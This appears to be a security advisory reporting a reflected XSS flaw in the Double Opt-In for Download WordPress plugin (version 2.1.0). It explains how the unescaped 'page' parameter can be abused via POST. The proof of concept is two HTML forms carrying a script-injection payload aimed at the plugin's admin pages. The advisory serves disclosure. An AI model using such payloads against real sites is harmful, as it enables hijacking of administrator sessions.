Double Opt-In for Download [Reflected XSS]

Description

plugin Double Opt-In for Download suffers from a Reflected XSS vulnerability because it doesn’t properly escape request variables before printing them to screen.

Vulnerable parameter is $_REQUEST['page']. Usually this variable will have the value assigned from $_GET['page'] but because WordPress first assign the $_RECUEST values from $_GET and secondly from $_POST, a malicious POST request can be used to access the vulnerable page and inject JS code to the vulnerable parameter at the same time.

The vulnerable parameter is used in both Downloads and Subscribers page of the plugin options (slugs are doifd-admin-menu_downloads and doifd-admin-menu_subscribers respectively).

PoC

It will take a user with administrative rights to submit those forms in order for this exploit to succeed.

<form action="http://sbwp2.dev/wp-admin/admin.php?page=doifd-admin-menu_downloads" method="post">
    <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>'>
    <input type="submit" value="Downloads">
</form>

<form action="http://sbwp2.dev/wp-admin/admin.php?page=doifd-admin-menu_subscribers" method="post">
    <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>'>
    <input type="submit" value="Subscribers">
</form>

---

WordPress Plugins Reflected XSS XSS

---

INFO

• 9 June 2016
• Pan Vag
• www.doubleoptinfordownload.com
• Double Opt-In for Download
• 2.1.0
• WordPress 4.5.2
• DWF-2016-87058